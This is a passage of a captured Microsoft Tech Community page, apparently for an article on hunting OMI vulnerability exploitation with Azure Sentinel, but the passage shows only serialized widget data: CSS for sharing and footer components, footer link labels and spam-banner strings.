[],"__typename":"ComponentProperties"},"components":
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 29 of 38

[{"id":"custom.widget.SocialSharing","form":null,"config":null,"props":
[],"__typename":"Component"}],"grouping":"CUSTOM","__typename":"ComponentTemplate"},"properties":{"config":
{"applicablePages":[],"description":"Adds buttons to share to various social media
websites","fetchedContent":null,"__typename":"ComponentConfiguration"},"props":
[],"__typename":"ComponentProperties"},"form":null,"__typename":"Component","localOverride":false},"globalCss":
{"css":".custom_widget_SocialSharing_sharePage_6x3n8_1 {\n display: flex;\n justify-content: center;\n background:
#d7d7d7;\n padding: 0;\n height: 3.75rem;\n}\n.custom_widget_SocialSharing_singleSocialIcons_6x3n8_8 {\n display:
flex;\n gap: 0.75rem;\n list-style-type: none;\n padding: 0;\n margin:
0;\n}\n.custom_widget_SocialSharing_containers_6x3n8_15 {\n display: flex;\n gap:
1.875rem;\n}\n.custom_widget_SocialSharing_listIcon_6x3n8_20 {\n align-content:
center;\n}\n.custom_widget_SocialSharing_headingShare_6x3n8_23 {\n display: inline;\n margin-right: 1.5625rem;\n
margin-bottom: 0;\n font-size: 1.25rem;\n font-weight: 550;\n align-content: center;\n}\n@media (max-width: 990px) {\n
.custom_widget_SocialSharing_sharePage_6x3n8_1 {\n display: flex;\n justify-content: center;\n }\n\n
.custom_widget_SocialSharing_containers_6x3n8_15 {\n display: inline-block;\n justify-content: center;\n align-content:
center;\n align-items: center;\n }\n .custom_widget_SocialSharing_headingShare_6x3n8_23 {\n display: flex;\n justify-content: center;\n }\n .custom_widget_SocialSharing_singleSocialIcons_6x3n8_8 {\n }\n}\n","tokens":
{"sharePage":"custom_widget_SocialSharing_sharePage_6x3n8_1","singleSocialIcons":"custom_widget_SocialSharing_singleSocialIcons_6x3n8_8","co
en-us-1774591586939":{"__typename":"CachedAsset","id":"component:custom.widget.MicrosoftFooter-en-us-1774591586939","value":{"component":{"id":"custom.widget.MicrosoftFooter","template":
{"id":"MicrosoftFooter","markupLanguage":"HANDLEBARS","style":".context-uhf {\r\n min-width: 280px;\r\n font-size:
15px;\r\n box-sizing: border-box;\r\n -ms-text-size-adjust: 100%;\r\n -webkit-text-size-adjust: 100%;\r\n & *,\r\n &
*:before,\r\n & *:after {\r\n box-sizing: inherit;\r\n }\r\n a.c-uhff-link {\r\n color: #616161;\r\n word-break: break-word;\r\n
text-decoration: none;\r\n }\r\n &a:link,\r\n &a:focus,\r\n &a:hover,\r\n &a:active,\r\n &a:visited {\r\n text-decoration:
none;\r\n color: inherit;\r\n }\r\n & div {\r\n font-family: 'Segoe UI', SegoeUI, 'Helvetica Neue', Helvetica, Arial, sans-serif;\r\n }\r\n}\r\n.c-uhff {\r\n background: #f2f2f2;\r\n margin: -1.5625;\r\n width: auto;\r\n height: auto;\r\n}\r\n.c-uhff-nav {\r\n margin: 0 auto;\r\n max-width: calc(1600px + 10%);\r\n padding: 0 5%;\r\n box-sizing: inherit;\r\n &:before,\r\n
&:after {\r\n content: ' ';\r\n display: table;\r\n clear: left;\r\n }\r\n @media only screen and (max-width: 1083px) {\r\n
padding-left: 12px;\r\n }\r\n .c-heading-4 {\r\n color: #616161;\r\n word-break: break-word;\r\n font-size: 15px;\r\n line-height: 20px;\r\n padding: 36px 0 4px;\r\n font-weight: 600;\r\n }\r\n .c-uhff-nav-row {\r\n .c-uhff-nav-group {\r\n display:
block;\r\n float: left;\r\n min-height: 1px;\r\n vertical-align: text-top;\r\n padding: 0 12px;\r\n width: 100%;\r\n zoom: 1;\r\n
&:first-child {\r\n padding-left: 0;\r\n @media only screen and (max-width: 1083px) {\r\n padding-left: 12px;\r\n }\r\n }\r\n
@media only screen and (min-width: 540px) and (max-width: 1082px) {\r\n width: 33.33333%;\r\n }\r\n @media only
screen and (min-width: 1083px) {\r\n width: 16.6666666667%;\r\n }\r\n ul.c-list.f-bare {\r\n font-size: 11px;\r\n line-height:
16px;\r\n margin-top: 0;\r\n margin-bottom: 0;\r\n padding-left: 0;\r\n list-style-type: none;\r\n li {\r\n word-break: break-word;\r\n padding: 8px 0;\r\n margin: 0;\r\n }\r\n }\r\n }\r\n }\r\n}\r\n.c-uhff-base {\r\n background: #f2f2f2;\r\n margin: 0
auto;\r\n max-width: calc(1600px + 10%);\r\n padding: 30px 5% 16px;\r\n &:before,\r\n &:after {\r\n content: ' ';\r\n
display: table;\r\n }\r\n &:after {\r\n clear: both;\r\n }\r\n a.c-uhff-ccpa,\r\n a.c-uhff-consumer {\r\n display: flex;\r\n float:
left;\r\n font-size: 11px;\r\n line-height: 16px;\r\n padding: 4px 24px 0 0;\r\n }\r\n a.c-uhff-ccpa:hover,\r\n a.c-uhff-consumer:hover {\r\n text-decoration: underline;\r\n }\r\n ul.c-list {\r\n font-size: 11px;\r\n line-height: 16px;\r\n float:
right;\r\n margin: 3px 0;\r\n color: #616161;\r\n li {\r\n padding: 0 24px 4px 0;\r\n display: inline-block;\r\n }\r\n }\r\n .c-list.f-bare {\r\n padding-left: 0;\r\n list-style-type: none;\r\n }\r\n @media only screen and (max-width: 1083px) {\r\n
display: flex;\r\n flex-wrap: wrap;\r\n padding: 30px 24px 16px;\r\n }\r\n}\r\n\r\n.social-share {\r\n position: fixed;\r\n top:
60%;\r\n transform: translateY(-50%);\r\n left: 0;\r\n z-index: 1000;\r\n}\r\n\r\n.sharing-options {\r\n list-style: none;\r\n
padding: 0;\r\n margin: 0;\r\n display: block;\r\n flex-direction: column;\r\n background-color: white;\r\n width: 50px;\r\n
border-radius: 0px 7px 7px 0px;\r\n}\r\n.linkedin-icon {\r\n border-top-right-radius: 7px;\r\n}\r\n.linkedin-icon:hover {\r\n
border-radius: 0;\r\n}\r\n\r\n.social-share-email-image:hover {\r\n border-radius: 0;\r\n}\r\n\r\n.social-link-footer:hover
.linkedin-icon {\r\n border-radius: 0;\r\n}\r\n.social-link-footer:hover .social-share-email-image {\r\n border-radius:
0;\r\n}\r\n\r\n.social-link-footer img {\r\n width: 30px;\r\n height: auto;\r\n transition: filter 0.3s ease;\r\n}\r\n\r\n.social-share-list {\r\n width: 50px;\r\n}\r\n.social-share-rss-image {\r\n width: 30px;\r\n height: auto;\r\n transition: filter 0.3s
ease;\r\n}\r\n.sharing-options li {\r\n width: 50px;\r\n height: 50px;\r\n padding: 8px;\r\n box-sizing: border-box;\r\n border:
2px solid white;\r\n display: inline-block;\r\n text-align: center;\r\n opacity: 1;\r\n visibility: visible;\r\n transition: border
0.3s ease; /* Smooth transition effect */\r\n border-left: none;\r\n border-bottom: none; /* Apply bottom border to only last
item */\r\n}\r\n\r\n.social-share-list-linkedin {\r\n background-color: #0474b4;\r\n border-top-right-radius: 5px; /* Rounded
top right corner of first item*/\r\n}\r\n.social-share-list-facebook {\r\n background-color: #3c5c9c;\r\n}\r\n.social-share-list-xicon {\r\n background-color: #000;\r\n}\r\n.social-share-list-reddit {\r\n background-color: #fc4404;\r\n}\r\n.social-share-list-bluesky {\r\n background-color: #f0f2f5;\r\n}\r\n.social-share-list-rss {\r\n background-color: #ec7b1c;\r\n}\r\n.social-share-list-mail {\r\n background-color: #848484;\r\n border-bottom-right-radius: 5px; /* Rounded bottom right corner of last
item*/\r\n}\r\n.sharing-options li.social-share-list-mail {\r\n border-bottom: 2px solid white; /* Add bottom border only to
the last item */\r\n height: 52px; /* Increase last child height to make in align with the hover label */\r\n}\r\n.x-icon {\r\n
filter: invert(100%);\r\n transition: filter 0.3s ease;\r\n width: 20px !important;\r\n height: auto;\r\n padding-top: 5px
!important;\r\n}\r\n.bluesky-icon {\r\n filter: invert(20%) sepia(100%) saturate(3000%) hue-rotate(180deg);\r\n transition:
filter 0.3s ease;\r\n padding-top: 5px !important;\r\n width: 25px !important;\r\n}\r\n\r\n.share-icon {\r\n border: 2px solid
transparent;\r\n display: inline-block;\r\n position: relative;\r\n}\r\n\r\n.sharing-options li:hover {\r\n border: 2px solid
white;\r\n border-left: none;\r\n border-bottom: none;\r\n border-radius: 0px;\r\n}\r\n.sharing-options li.social-share-list-https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 30 of 38

mail:hover {\r\n border-bottom: 2px solid white; /* Add bottom border only to the last item */\r\n}\r\n\r\n.sharing-options
li:hover .label {\r\n opacity: 1;\r\n visibility: visible;\r\n border: 2px solid white;\r\n box-sizing: border-box;\r\n border-left:
none;\r\n}\r\n\r\n.label {\r\n position: absolute;\r\n left: 100%;\r\n white-space: nowrap;\r\n opacity: 0;\r\n visibility:
hidden;\r\n transition: all 0.2s ease;\r\n color: white;\r\n border-radius: 0 10 0 10px;\r\n top: 50%;\r\n transform:
translateY(-50%);\r\n height: 52px;\r\n display: flex;\r\n align-items: center;\r\n justify-content: center;\r\n padding: 10px
12px 15px 8px;\r\n border: 2px solid white;\r\n}\r\n.linkedin {\r\n background-color: #0474b4;\r\n border-top-right-radius:
5px; /* Rounded top right corner of first item*/\r\n}\r\n.facebook {\r\n background-color: #3c5c9c;\r\n}\r\n.twitter {\r\n
background-color: black;\r\n color: white;\r\n}\r\n.reddit {\r\n background-color: #fc4404;\r\n}\r\n.mail {\r\n background-color: #848484;\r\n border-bottom-right-radius: 5px; /* Rounded bottom right corner of last item*/\r\n}\r\n.bluesky {\r\n
background-color: #f0f2f5;\r\n color: black;\r\n}\r\n.rss {\r\n background-color: #ec7b1c;\r\n}\r\n\r\n@media (max-width:
991px) {\r\n .social-share {\r\n display: none;\r\n }\r\n}\r\n","texts":{"heading.whatsNew":"What's
new","heading.store":"Microsoft
Store","heading.education":"Education","heading.business":"Business","heading.developer":"Developer &
IT","heading.company":"Company","link.whatsNew.surfacePro":"Surface Pro","aria.whatsNew.surfacePro":"Surface Pro
What's new","link.whatsNew.surfaceLaptop":"Surface Laptop","aria.whatsNew.surfaceLaptop":"Surface Laptop What's
new","link.whatsNew.surfaceLaptopStudio2":"Surface Laptop Studio 2","aria.whatsNew.surfaceLaptopStudio2":"Surface
Laptop Studio 2 What's new","link.whatsNew.copilotOrganizations":"Copilot for
organizations","aria.whatsNew.copilotOrganizations":"Copilot for organizations What's
new","link.whatsNew.copilotPersonal":"Copilot for personal use","aria.whatsNew.copilotPersonal":"Copilot for personal
use What's new","link.whatsNew.aiInWindows":"AI in Windows","aria.whatsNew.aiInWindows":"AI in Windows What's
new","link.whatsNew.exploreProducts":"Explore Microsoft products","aria.whatsNew.exploreProducts":"Explore Microsoft
products What's new","link.whatsNew.windows11Apps":"Windows 11 apps","aria.whatsNew.windows11Apps":"Windows
11 apps What's new","link.store.accountProfile":"Account profile","aria.store.accountProfile":"Account profile Microsoft
Store","link.store.downloadCenter":"Download Center","aria.store.downloadCenter":"Download Center Microsoft
Store","link.store.support":"Microsoft Store support","aria.store.support":"Microsoft Store support Microsoft
Store","link.store.returns":"Returns","aria.store.returns":"Returns Microsoft Store","link.store.orderTracking":"Order
tracking","aria.store.orderTracking":"Order tracking Microsoft Store","link.store.certifiedRefurbished":"Certified
Refurbished","aria.store.certifiedRefurbished":"Certified Refurbished Microsoft Store","link.store.promise":"Microsoft
Store Promise","aria.store.promise":"Microsoft Store Promise Microsoft Store","link.store.flexiblePayments":"Flexible
Payments","aria.store.flexiblePayments":"Flexible Payments Microsoft
Store","link.education.microsoftInEducation":"Microsoft in education","aria.education.microsoftInEducation":"Microsoft in
education Education","link.education.devices":"Devices for education","aria.education.devices":"Devices for education
Education","link.education.teams":"Microsoft Teams for Education","aria.education.teams":"Microsoft Teams for Education
Education","link.education.m365":"Microsoft 365 Education","aria.education.m365":"Microsoft 365 Education
Education","link.education.howToBuy":"How to buy for your school","aria.education.howToBuy":"How to buy for your
school Education","link.education.training":"Educator training and development","aria.education.training":"Educator
training and development Education","link.education.deals":"Deals for students and parents","aria.education.deals":"Deals
for students and parents Education","link.education.ai":"AI for education","aria.education.ai":"AI for education
Education","link.business.microsoftAi":"Microsoft AI","aria.business.microsoftAi":"Microsoft AI
Business","link.business.security":"Microsoft Security","aria.business.security":"Microsoft Security
Business","link.business.dynamics":"Dynamics 365","aria.business.dynamics":"Dynamics 365
Business","link.business.m365":"Microsoft 365","aria.business.m365":"Microsoft 365
Business","link.business.powerPlatform":"Microsoft Power Platform","aria.business.powerPlatform":"Microsoft Power
Platform Business","link.business.teams":"Microsoft Teams","aria.business.teams":"Microsoft Teams
Business","link.business.m365Copilot":"Microsoft 365 Copilot","aria.business.m365Copilot":"Microsoft 365 Copilot
Business","link.business.smallBusiness":"Small Business","aria.business.smallBusiness":"Small Business
Business","link.developer.azure":"Azure","aria.developer.azure":"Azure Developer &
IT","link.developer.developerCenter":"Microsoft Developer","aria.developer.developerCenter":"Microsoft Developer
Developer & IT","link.developer.learn":"Microsoft Learn","aria.developer.learn":"Microsoft Learn Developer &
IT","link.developer.aiMarketplace":"Support for AI marketplace apps","aria.developer.aiMarketplace":"Support for AI
marketplace apps Developer & IT","link.developer.techCommunity":"Microsoft Tech
Community","aria.developer.techCommunity":"Microsoft Tech Community Developer &
IT","link.developer.marketplace":"Microsoft Marketplace","aria.developer.marketplace":"Microsoft Marketplace Developer
& IT","link.developer.marketplaceRewards":"Marketplace Rewards","aria.developer.marketplaceRewards":"Marketplace
Rewards Developer & IT","link.developer.visualStudio":"Visual Studio","aria.developer.visualStudio":"Visual Studio
Developer & IT","link.company.careers":"Careers","aria.company.careers":"Careers
Company","link.company.about":"About Microsoft","aria.company.about":"About Microsoft
Company","link.company.news":"Company news","aria.company.news":"Company news
Company","link.company.privacy":"Privacy at Microsoft","aria.company.privacy":"Privacy at Microsoft
Company","link.company.investors":"Investors","aria.company.investors":"Investors
Company","link.company.diversity":"Diversity and inclusion","aria.company.diversity":"Diversity and inclusion
Company","link.company.accessibility":"Accessibility","aria.company.accessibility":"Accessibility
Company","link.company.sustainability":"Sustainability","aria.company.sustainability":"Sustainability
Company","ccpa.label":"Your Privacy Choices","consumerhealthprivacy.label":"Consumer Health
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 31 of 38

Privacy","corp.sitemap":"Sitemap","corp.contact":"Contact
Microsoft","corp.privacy":"Privacy","corp.manageCookies":"Manage cookies","corp.terms":"Terms of
use","corp.trademarks":"Trademarks","corp.safetyEco":"Safety &
eco","corp.recycling":"Recycling","corp.aboutAds":"About our
ads","corp.microsoft":"Microsoft","social.linkedin.alt":"Share to LinkedIn","social.linkedin.label":"Share on
LinkedIn","social.facebook.alt":"Share to Facebook","social.facebook.label":"Share on Facebook","social.x.alt":"Share to
X","social.x.label":"Share on X","social.reddit.alt":"Share to Reddit","social.reddit.label":"Share on
Reddit","social.bluesky.alt":"Share to Blue Sky","social.bluesky.label":"Share on Bluesky","social.rss.alt":"Subscribe to
RSS","social.rss.label":"Share on RSS","social.email.alt":"Share to Email","social.email.label":"Share on
Email"},"defaults":{"config":{"applicablePages":[],"description":"The Microsoft
Footer","fetchedContent":null,"__typename":"ComponentConfiguration"},"props":
[],"__typename":"ComponentProperties"},"components":
[{"id":"custom.widget.MicrosoftFooter","form":null,"config":null,"props":
[],"__typename":"Component"}],"grouping":"CUSTOM","__typename":"ComponentTemplate"},"properties":{"config":
{"applicablePages":[],"description":"The Microsoft
Footer","fetchedContent":null,"__typename":"ComponentConfiguration"},"props":
[],"__typename":"ComponentProperties"},"form":null,"__typename":"Component","localOverride":false},"globalCss":
{"css":".custom_widget_MicrosoftFooter_context-uhf_qp4x5_1 {\r\n min-width: 17.5rem;\r\n font-size: 0.9375rem;\r\n
box-sizing: border-box;\r\n -ms-text-size-adjust: 100%;\r\n -webkit-text-size-adjust: 100%;\r\n & *,\r\n & *:before,\r\n &
*:after {\r\n box-sizing: inherit;\r\n }\r\n a.custom_widget_MicrosoftFooter_c-uhff-link_qp4x5_23 {\r\n color: #616161;\r\n
word-break: break-word;\r\n text-decoration: none;\r\n }\r\n &a:link,\r\n &a:focus,\r\n &a:hover,\r\n &a:active,\r\n
&a:visited {\r\n text-decoration: none;\r\n color: inherit;\r\n }\r\n & div {\r\n font-family: 'Segoe UI', SegoeUI, 'Helvetica
Neue', Helvetica, Arial, sans-serif;\r\n }\r\n}\r\n.custom_widget_MicrosoftFooter_c-uhff_qp4x5_23 {\r\n background:
#f2f2f2;\r\n margin: -1.5625;\r\n width: auto;\r\n height: auto;\r\n}\r\n.custom_widget_MicrosoftFooter_c-uhff-nav_qp4x5_69 {\r\n margin: 0 auto;\r\n max-width: calc(100rem + 10%);\r\n padding: 0 5%;\r\n box-sizing: inherit;\r\n
&:before,\r\n &:after {\r\n content: ' ';\r\n display: table;\r\n clear: left;\r\n }\r\n @media only screen and (max-width:
1083px) {\r\n padding-left: 0.75rem;\r\n }\r\n .custom_widget_MicrosoftFooter_c-heading-4_qp4x5_97 {\r\n color:
#616161;\r\n word-break: break-word;\r\n font-size: 0.9375rem;\r\n line-height: 1.25rem;\r\n padding: 2.25rem 0
0.25rem;\r\n font-weight: 600;\r\n }\r\n .custom_widget_MicrosoftFooter_c-uhff-nav-row_qp4x5_113 {\r\n
.custom_widget_MicrosoftFooter_c-uhff-nav-group_qp4x5_115 {\r\n display: block;\r\n float: left;\r\n min-height:
0.0625rem;\r\n vertical-align: text-top;\r\n padding: 0 0.75rem;\r\n width: 100%;\r\n zoom: 1;\r\n &:first-child {\r\n padding-left: 0;\r\n @media only screen and (max-width: 1083px) {\r\n padding-left: 0.75rem;\r\n }\r\n }\r\n @media only screen
and (min-width: 540px) and (max-width: 1082px) {\r\n width: 33.33333%;\r\n }\r\n @media only screen and (min-width:
1083px) {\r\n width: 16.6666666667%;\r\n }\r\n ul.custom_widget_MicrosoftFooter_c-list_qp4x5_155.custom_widget_MicrosoftFooter_f-bare_qp4x5_155 {\r\n font-size: 0.6875rem;\r\n line-height: 1rem;\r\n
margin-top: 0;\r\n margin-bottom: 0;\r\n padding-left: 0;\r\n list-style-type: none;\r\n li {\r\n word-break: break-word;\r\n
padding: 0.5rem 0;\r\n margin: 0;\r\n }\r\n }\r\n }\r\n }\r\n}\r\n.custom_widget_MicrosoftFooter_c-uhff-base_qp4x5_187
{\r\n background: #f2f2f2;\r\n margin: 0 auto;\r\n max-width: calc(100rem + 10%);\r\n padding: 1.875rem 5% 1rem;\r\n
&:before,\r\n &:after {\r\n content: ' ';\r\n display: table;\r\n }\r\n &:after {\r\n clear: both;\r\n }\r\n
a.custom_widget_MicrosoftFooter_c-uhff-ccpa_qp4x5_213,\r\n a.custom_widget_MicrosoftFooter_c-uhff-consumer_qp4x5_215 {\r\n display: flex;\r\n float: left;\r\n font-size: 0.6875rem;\r\n line-height: 1rem;\r\n padding: 0.25rem
1.5rem 0 0;\r\n }\r\n a.custom_widget_MicrosoftFooter_c-uhff-ccpa_qp4x5_213:hover,\r\n
a.custom_widget_MicrosoftFooter_c-uhff-consumer_qp4x5_215:hover {\r\n text-decoration: underline;\r\n }\r\n
ul.custom_widget_MicrosoftFooter_c-list_qp4x5_155 {\r\n font-size: 0.6875rem;\r\n line-height: 1rem;\r\n float: right;\r\n
margin: 0.1875rem 0;\r\n color: #616161;\r\n li {\r\n padding: 0 1.5rem 0.25rem 0;\r\n display: inline-block;\r\n }\r\n }\r\n
.custom_widget_MicrosoftFooter_c-list_qp4x5_155.custom_widget_MicrosoftFooter_f-bare_qp4x5_155 {\r\n padding-left:
0;\r\n list-style-type: none;\r\n }\r\n @media only screen and (max-width: 1083px) {\r\n display: flex;\r\n flex-wrap:
wrap;\r\n padding: 1.875rem 1.5rem 1rem;\r\n }\r\n}\r\n.custom_widget_MicrosoftFooter_social-share_qp4x5_281 {\r\n
position: fixed;\r\n top: 60%;\r\n transform: translateY(-50%);\r\n left: 0;\r\n z-index:
1000;\r\n}\r\n.custom_widget_MicrosoftFooter_sharing-options_qp4x5_297 {\r\n list-style: none;\r\n padding: 0;\r\n
margin: 0;\r\n display: block;\r\n flex-direction: column;\r\n background-color: white;\r\n width: 3.125rem;\r\n border-radius: 0 0.4375rem 0.4375rem 0;\r\n}\r\n.custom_widget_MicrosoftFooter_linkedin-icon_qp4x5_317 {\r\n border-top-right-radius: 7px;\r\n}\r\n.custom_widget_MicrosoftFooter_linkedin-icon_qp4x5_317:hover {\r\n border-radius:
0;\r\n}\r\n.custom_widget_MicrosoftFooter_social-share-email-image_qp4x5_331:hover {\r\n border-radius:
0;\r\n}\r\n.custom_widget_MicrosoftFooter_social-link-footer_qp4x5_339:hover
.custom_widget_MicrosoftFooter_linkedin-icon_qp4x5_317 {\r\n border-radius:
0;\r\n}\r\n.custom_widget_MicrosoftFooter_social-link-footer_qp4x5_339:hover .custom_widget_MicrosoftFooter_social-share-email-image_qp4x5_331 {\r\n border-radius: 0;\r\n}\r\n.custom_widget_MicrosoftFooter_social-link-footer_qp4x5_339 img {\r\n width: 1.875rem;\r\n height: auto;\r\n transition: filter 0.3s
ease;\r\n}\r\n.custom_widget_MicrosoftFooter_social-share-list_qp4x5_365 {\r\n width:
3.125rem;\r\n}\r\n.custom_widget_MicrosoftFooter_social-share-rss-image_qp4x5_371 {\r\n width: 1.875rem;\r\n height:
auto;\r\n transition: filter 0.3s ease;\r\n}\r\n.custom_widget_MicrosoftFooter_sharing-options_qp4x5_297 li {\r\n width:
3.125rem;\r\n height: 3.125rem;\r\n padding: 0.5rem;\r\n box-sizing: border-box;\r\n border: 2px solid white;\r\n display:
inline-block;\r\n text-align: center;\r\n opacity: 1;\r\n visibility: visible;\r\n transition: border 0.3s ease; /* Smooth transition
https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 32 of 38

effect */\r\n border-left: none;\r\n border-bottom: none; /* Apply bottom border to only last item
*/\r\n}\r\n.custom_widget_MicrosoftFooter_social-share-list-linkedin_qp4x5_411 {\r\n background-color: #0474b4;\r\n
border-top-right-radius: 5px; /* Rounded top right corner of first item*/\r\n}\r\n.custom_widget_MicrosoftFooter_social-share-list-facebook_qp4x5_419 {\r\n background-color: #3c5c9c;\r\n}\r\n.custom_widget_MicrosoftFooter_social-share-list-xicon_qp4x5_425 {\r\n background-color: #000;\r\n}\r\n.custom_widget_MicrosoftFooter_social-share-list-reddit_qp4x5_431 {\r\n background-color: #fc4404;\r\n}\r\n.custom_widget_MicrosoftFooter_social-share-list-bluesky_qp4x5_437 {\r\n background-color: #f0f2f5;\r\n}\r\n.custom_widget_MicrosoftFooter_social-share-list-rss_qp4x5_443 {\r\n background-color: #ec7b1c;\r\n}\r\n.custom_widget_MicrosoftFooter_social-share-list-mail_qp4x5_449 {\r\n background-color: #848484;\r\n border-bottom-right-radius: 5px; /* Rounded bottom right corner of
last item*/\r\n}\r\n.custom_widget_MicrosoftFooter_sharing-options_qp4x5_297 li.custom_widget_MicrosoftFooter_social-share-list-mail_qp4x5_449 {\r\n border-bottom: 2px solid white; /* Add bottom border only to the last item */\r\n height:
3.25rem; /* Increase last child height to make in align with the hover label */\r\n}\r\n.custom_widget_MicrosoftFooter_x-icon_qp4x5_465 {\r\n filter: invert(100%);\r\n transition: filter 0.3s ease;\r\n width: 1.25rem !important;\r\n height: auto;\r\n
padding-top: 0.3125rem !important;\r\n}\r\n.custom_widget_MicrosoftFooter_bluesky-icon_qp4x5_479 {\r\n filter:
invert(20%) sepia(100%) saturate(3000%) hue-rotate(180deg);\r\n transition: filter 0.3s ease;\r\n padding-top: 0.3125rem
!important;\r\n width: 1.5625rem !important;\r\n}\r\n.custom_widget_MicrosoftFooter_share-icon_qp4x5_493 {\r\n border:
2px solid transparent;\r\n display: inline-block;\r\n position: relative;\r\n}\r\n.custom_widget_MicrosoftFooter_sharing-options_qp4x5_297 li:hover {\r\n border: 2px solid white;\r\n border-left: none;\r\n border-bottom: none;\r\n border-radius:
0;\r\n}\r\n.custom_widget_MicrosoftFooter_sharing-options_qp4x5_297 li.custom_widget_MicrosoftFooter_social-share-list-mail_qp4x5_449:hover {\r\n border-bottom: 2px solid white; /* Add bottom border only to the last item
*/\r\n}\r\n.custom_widget_MicrosoftFooter_sharing-options_qp4x5_297 li:hover
.custom_widget_MicrosoftFooter_label_qp4x5_525 {\r\n opacity: 1;\r\n visibility: visible;\r\n border: 2px solid white;\r\n
box-sizing: border-box;\r\n border-left: none;\r\n}\r\n.custom_widget_MicrosoftFooter_label_qp4x5_525 {\r\n position:
absolute;\r\n left: 100%;\r\n white-space: nowrap;\r\n opacity: 0;\r\n visibility: hidden;\r\n transition: all 0.2s ease;\r\n color:
white;\r\n border-radius: 0 10 0 0.625rem;\r\n top: 50%;\r\n transform: translateY(-50%);\r\n height: 3.25rem;\r\n display:
flex;\r\n align-items: center;\r\n justify-content: center;\r\n padding: 0.625rem 0.75rem 0.9375rem 0.5rem;\r\n border: 2px
solid white;\r\n}\r\n.custom_widget_MicrosoftFooter_linkedin_qp4x5_317 {\r\n background-color: #0474b4;\r\n border-top-right-radius: 5px; /* Rounded top right corner of first
item*/\r\n}\r\n.custom_widget_MicrosoftFooter_facebook_qp4x5_585 {\r\n background-color:
#3c5c9c;\r\n}\r\n.custom_widget_MicrosoftFooter_twitter_qp4x5_591 {\r\n background-color: black;\r\n color:
white;\r\n}\r\n.custom_widget_MicrosoftFooter_reddit_qp4x5_599 {\r\n background-color:
#fc4404;\r\n}\r\n.custom_widget_MicrosoftFooter_mail_qp4x5_605 {\r\n background-color: #848484;\r\n border-bottom-right-radius: 5px; /* Rounded bottom right corner of last
item*/\r\n}\r\n.custom_widget_MicrosoftFooter_bluesky_qp4x5_479 {\r\n background-color: #f0f2f5;\r\n color:
black;\r\n}\r\n.custom_widget_MicrosoftFooter_rss_qp4x5_621 {\r\n background-color: #ec7b1c;\r\n}\r\n@media (max-width: 991px) {\r\n .custom_widget_MicrosoftFooter_social-share_qp4x5_281 {\r\n display: none;\r\n }\r\n}\r\n","tokens":
{"context-uhf":"custom_widget_MicrosoftFooter_context-uhf_qp4x5_1","c-uhff-link":"custom_widget_MicrosoftFooter_c-uhff-link_qp4x5_23","c-uhff":"custom_widget_MicrosoftFooter_c-uhff_qp4x5_23","c-uhff-nav":"custom_widget_MicrosoftFooter_c-uhff-nav_qp4x5_69","c-heading-4":"custom_widget_MicrosoftFooter_c-heading-4_qp4x5_97","c-uhff-nav-row":"custom_widget_MicrosoftFooter_c-uhff-nav-row_qp4x5_113","c-uhff-nav-group":"custom_widget_MicrosoftFooter_c-uhff-nav-group_qp4x5_115","c-list":"custom_widget_MicrosoftFooter_c-list_qp4x5_155","f-bare":"custom_widget_MicrosoftFooter_f-bare_qp4x5_155","c-uhff-base":"custom_widget_MicrosoftFooter_c-uhff-base_qp4x5_187","c-uhff-ccpa":"custom_widget_MicrosoftFooter_c-uhff-ccpa_qp4x5_213","c-uhff-consumer":"custom_widget_MicrosoftFooter_c-uhff-consumer_qp4x5_215","social-share":"custom_widget_MicrosoftFooter_social-share_qp4x5_281","sharing-options":"custom_widget_MicrosoftFooter_sharing-options_qp4x5_297","linkedin-icon":"custom_widget_MicrosoftFooter_linkedin-icon_qp4x5_317","social-share-email-image":"custom_widget_MicrosoftFooter_social-share-email-image_qp4x5_331","social-link-footer":"custom_widget_MicrosoftFooter_social-link-footer_qp4x5_339","social-share-list":"custom_widget_MicrosoftFooter_social-share-list_qp4x5_365","social-share-rss-image":"custom_widget_MicrosoftFooter_social-share-rss-image_qp4x5_371","social-share-list-linkedin":"custom_widget_MicrosoftFooter_social-share-list-linkedin_qp4x5_411","social-share-list-facebook":"custom_widget_MicrosoftFooter_social-share-list-facebook_qp4x5_419","social-share-list-xicon":"custom_widget_MicrosoftFooter_social-share-list-xicon_qp4x5_425","social-share-list-reddit":"custom_widget_MicrosoftFooter_social-share-list-reddit_qp4x5_431","social-share-list-bluesky":"custom_widget_MicrosoftFooter_social-share-list-bluesky_qp4x5_437","social-share-list-rss":"custom_widget_MicrosoftFooter_social-share-list-rss_qp4x5_443","social-share-list-mail":"custom_widget_MicrosoftFooter_social-share-list-mail_qp4x5_449","x-icon":"custom_widget_MicrosoftFooter_x-icon_qp4x5_465","bluesky-icon":"custom_widget_MicrosoftFooter_bluesky-icon_qp4x5_479","share-icon":"custom_widget_MicrosoftFooter_share-icon_qp4x5_493","label":"custom_widget_MicrosoftFooter_label_qp4x5_525","linkedin":"custom_widget_MicrosoftFooter_linkedin_qp4x5_317","faceb
components/community/Breadcrumb-1775111751222":{"__typename":"CachedAsset","id":"text:en_US-components/community/Breadcrumb-1775111751222","value":{"navLabel":"Breadcrumbs","dropdown":"Additional parent
page navigation"},"localOverride":false},"CachedAsset:text:en_US-components/messages/MessageBanner-https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093
Page 33 of 38

1775111751222":{"__typename":"CachedAsset","id":"text:en_US-components/messages/MessageBanner-1775111751222","value":{"messageMarkedAsSpam":"This post has been marked as
spam","messageMarkedAsSpam@board:TKB":"This article has been marked as
spam","messageMarkedAsSpam@board:BLOG":"This post has been marked as
spam","messageMarkedAsSpam@board:FORUM":"This discussion has been marked as
spam","messageMarkedAsSpam@board:OCCASION":"This event has been marked as
spam","messageMarkedAsSpam@board:IDEA":"This idea has been marked as spam","manageSpam":"Manage
Spam","messageMarkedAsAbuse":"This post has been marked as abuse","messageMarkedAsAbuse@board:TKB":"This
article has been marked as abuse","messageMarkedAsAbuse@board:BLOG":"This post has been marked as
abuse","messageMarkedAsAbuse@board:FORUM":"This discussion has been marked as
abuse","messageMarkedAsAbuse@board:OCCASION":"This event has been marked as
